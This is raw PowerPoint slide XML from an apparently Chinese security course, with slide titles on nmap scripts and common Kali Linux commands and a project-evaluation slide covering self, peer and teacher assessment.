                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>练习使用namp脚本命令。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="4000" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4592955" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3.3.1 namp脚本介绍</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>
  </p:transition>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>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a:xfrm>
            <a:off x="533756" y="1971129"/>
            <a:ext cx="4302496" cy="521035"/>
            <a:chOff x="6627851" y="1871939"/>
            <a:chExt cx="4302496" cy="521035"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="1871939"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="2086269"/>
              <a:ext cx="3636897" cy="306705"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="文本框 570"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7274400" y="1887541"/>
              <a:ext cx="1402080" cy="460375"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>学生自评</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="1914354"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="533756" y="3513239"/>
            <a:ext cx="4302496" cy="524299"/>
            <a:chOff x="6627851" y="3492048"/>
            <a:chExt cx="4302496" cy="524597"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3709766"/>
              <a:ext cx="3636897" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3492048"/>
              <a:ext cx="1402080" cy="460637"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>学生互评</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="组合 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="562331" y="4955527"/>
            <a:ext cx="4302496" cy="525366"/>
            <a:chOff x="6627851" y="5163977"/>
            <a:chExt cx="4302496" cy="525665"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="矩形: 圆角 28"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="5163977"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="5382763"/>
              <a:ext cx="3636897" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="文本框 576"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="5193635"/>
              <a:ext cx="2011680" cy="460637"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>教师综合评价</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="文本框 577"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="5210848"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>03</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目评价】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="矩形 18"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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20" name="矩形 19"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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21" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5029200" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>.1</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Kali Linux常用命令</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="9" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
